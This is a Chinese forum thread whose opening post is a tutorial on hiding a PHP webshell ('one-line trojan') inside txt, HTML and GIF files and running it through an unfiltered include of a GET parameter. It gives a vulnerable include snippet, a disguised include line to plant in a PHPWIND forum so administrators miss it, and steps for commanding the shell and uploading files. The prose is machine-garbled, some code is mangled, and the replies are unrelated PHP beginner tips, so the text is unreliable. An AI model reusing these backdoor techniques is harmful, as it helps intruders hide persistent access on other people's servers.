仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 1247|回复: 20
打印 上一主题 下一主题

[学习教程] PHP网站制作之平安常识:若何埋没 PHP文件后门的技能...

[复制链接]
若天明 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-2-4 00:02:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
算是1个熟悉的过程,所以c语言的基础有就更好,没有也不怕。     比来良多伴侣都在问我是不是能把我那一句话木马埋没到HTML或图片里,其实把一句话木马拔出到PHP文件中就已很荫蔽了,假如说硬是要放到HTML文件或图片里,就接着往下看的这篇测试呈报吧。
  
   要晓得假如光把PHP语句放到图片里是不管若何也不克不及履行的,由于PHP只解析扩大名为php的文件。所以说要能使埋没在图片里的PHP语句履行。咱们就的借助PHP中的挪用函数 :include 、require 等。
  咱们还记得前些日子把木马埋没到图片的文章吧。也就是在PHP文件里用include("x.gif")如许的语句来挪用埋没在图片的木马语句。ASP中语句也相似。看似十分荫蔽但直接挪用图片对略微懂点PHP的人就不难发明可疑的地方。因为URL 里用GET体例很难传递参数,这就使得拔出木马的功能得不到发扬。
  Include 函数在PHP中利用的对照频仍,所以引发的平安成绩也其实太多,例如PHPWIND1.36的破绽就是由于include前面的变量没做过滤引发的。由此咱们就能够机关相似的语句来拔出到PHP文件中。然后把木马埋没到图片或HTML文件里,可以说荫蔽性就更高了。如在PHPWIND服装论坛里拔出上面的语句:
     CODE:
     <‘’?@include includ/.$PHPWIND_ROOT;? >

普通办理员是没法看出来的。

  有了include 函数来帮助协助咱们就能够把PHP木马埋没到 诸如 txt、html和图片文件等良多类型的文件里来了。由于txt、html和图片文件这三品种型的文件最不管在服装论坛仍是文章体系里是最为罕见的了,上面咱们就顺次来做测试。
  起首创立一PHP文件test.php 文件内容为:
    CODE:$test=$_GET['test'];
    @include 'test/'.$test;
    ?>
  Txt文件普通都是申明文件,所以咱们把一句话木马放到目次的申明文件里就OK了。随意创立一个TXT文件t.txt。咱们把一句话木马粘贴到t.txt文件里。然后会见 hxxp://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后食客户端 木马地址添入 hxxp://localhost/test/test.php?test=../t.txt 暗码里添入cmd就能够了,履行前往的了局都可以看到。
  关于HTML的文件,普通都为模版文件。为了使拔出到HTML的文件的木马能被挪用履行并且不被显示出来,咱们可以在HTML里到场一个埋没属性的文本框 ,如: 然后利用办法同上。履行的前往了局普通都可以检查源文件看到。 如利用检查本法式目次功效。检查源文件内容为 我可以失掉目次为 C:\Uniserver2_7s\www\test。
  上面咱们说说图片文件,要说最为毒的一招莫过于把木马埋没到图片里。咱们可以直接对一个图片停止编纂,把拔出到图片末尾
  经测试普通都不会对图片形成影响。然后一样办法客户端木马地址添入
  咱们检查PHP情况变量 前往的是了局是原图片。
  这里能够要和咱们想象的了局有些差距了,其实号令已运转了,只是前往的了局看不到罢了,由于这是真实的GIF文件,所所以不会显示前往了局的,为了证实是不是真的履行了号令咱们 履行上传文件号令。果不出所料,文件已胜利上传到办事器上。如许捏造的长处是荫蔽性好。弱点也天然不必说了是没回显。假如你想看到前往的了局,那就拿出记事本捏造一个假的图片文件吧。
PHP成功的插入,删除,更新数据的时候,显然,你已经距离成功指日可待了。
小女巫 该用户已被删除
沙发
发表于 2015-2-4 08:05:00 | 只看该作者
对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用,而且里面的资料也比较有用,最好还是买个会员比较好,毕竟那些也是别人的工作成果。
因胸联盟 该用户已被删除
板凳
发表于 2015-2-9 19:50:14 | 只看该作者
爱上php,他也会爱上你。
小魔女 该用户已被删除
地板
发表于 2015-2-15 15:05:38 | 只看该作者
刚开始安装php的时候,我图了个省事,把php的扩展全都打开啦(就是把php.ini 那一片 extension 前面的冒号全去掉啦),这样自然有好处,以后不用再需要什么功能再来打开。
金色的骷髅 该用户已被删除
5#
发表于 2015-2-21 19:44:12 | 只看该作者
Ps:以上纯属原创,如有雷同,纯属巧合
只想知道 该用户已被删除
6#
发表于 2015-2-24 23:37:42 | 只看该作者
首先声明:我是一个菜鸟,是一个初学者。学习了一段php后总是感觉自己没有提高,无奈。经过反思我认为我学习过程中存在很多问题,我改变了学习方法后自我感觉有了明显的进步。
老尸 该用户已被删除
7#
发表于 2015-3-7 14:09:47 | 只看该作者
说php的话,首先得提一下数组,开始的时候我是最烦数组的,总是被弄的晕头转向,不过后来呢,我觉得数组里php里最强大的存储方法,所以建议新手们要学好数组。
谁可相欹 该用户已被删除
8#
发表于 2015-3-12 16:36:52 | 只看该作者
装在C盘下面可以利用windows的ghost功能可以还原回来(顺便当做是重转啦),当然啦我的编译目录要放在别的盘下,不然自己的劳动成果就悲剧啦。
深爱那片海 该用户已被删除
9#
发表于 2015-3-13 01:08:16 | 只看该作者
环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候,我强烈建议多读php手册。
若相依 该用户已被删除
10#
发表于 2015-3-18 17:22:48 | 只看该作者
遇到出错的时候,我经常把错误信息直接复制到 google的搜索栏,一般情况都是能搜到结果的,不过有时候会搜出来一大片英文的出来,这时候就得过滤一下,吧中文的弄出来,挨着式方法。
兰色精灵 该用户已被删除
11#
发表于 2015-3-22 18:10:30 | 只看该作者
最后介绍一个代码出错,但是老找不到错误方法,就是 go to wc (囧),出去换换气没准回来就找到错误啦。
莫相离 该用户已被删除
12#
发表于 2015-3-25 13:09:31 | 只看该作者
其实没啥难的,多练习,练习写程序,真正的实践比看100遍都有用。不过要熟悉引擎
柔情似水 该用户已被删除
13#
发表于 2015-4-11 21:13:19 | 只看该作者
真正的方向了,如果将来要去开发团队,你一定要学好smarty ,phplib这样的模板引擎,
再见西城 该用户已被删除
14#
发表于 2015-4-12 15:30:40 | 只看该作者
因为blog这样的可以让你接触更多要学的知识,可以接触用到类,模板,js ,ajax
admin 该用户已被删除
15#
发表于 2015-5-2 08:21:13 | 只看该作者
对于懒惰的朋友,我推荐php的集成环境xampp或者是wamp。这两个软件安装方便,使用简单。但是我还是强烈建议自己动手搭建开发环境。
若天明 该用户已被删除
16#
 楼主| 发表于 2015-5-4 08:39:20 | 只看该作者
找到的的资料很多都是在论坛里的,需要注册,所以我一般没到一个论坛都注册一个id,所有的id都注册成一样的,这样下次再进来的时候就不用重复注册啦。当然有些论坛的某些资料是需要的付费的。
小妖女 该用户已被删除
17#
发表于 2015-5-6 12:46:05 | 只看该作者
php里的数组为空的时候是不能拿来遍历的;(这个有点低级啊,不过我刚被这个边界问题墨迹了好长一会)
灵魂腐蚀 该用户已被删除
18#
发表于 2015-5-6 19:01:20 | 只看该作者
首推的搜索引擎当然是Google大神,其次我比较喜欢 百度知道。不过搜出来的结果往往都是 大家copy来copy去的,运气的的概率很大。
爱飞 该用户已被删除
19#
发表于 2015-6-13 20:31:33 | 只看该作者
Apache不是非得用80或者8080端口的,我刚开始安得时候就是80端口老占用,就用了个 81端口,结果照常,就是输localhost的时候,应该输入为 localhost:81
愤怒的大鸟 该用户已被删除
20#
发表于 2015-6-17 11:34:01 | 只看该作者
多看优秀程序员编写的代码,仔细理解他们解决问题的方法,对自身有很大的帮助。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-11-14 13:54

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表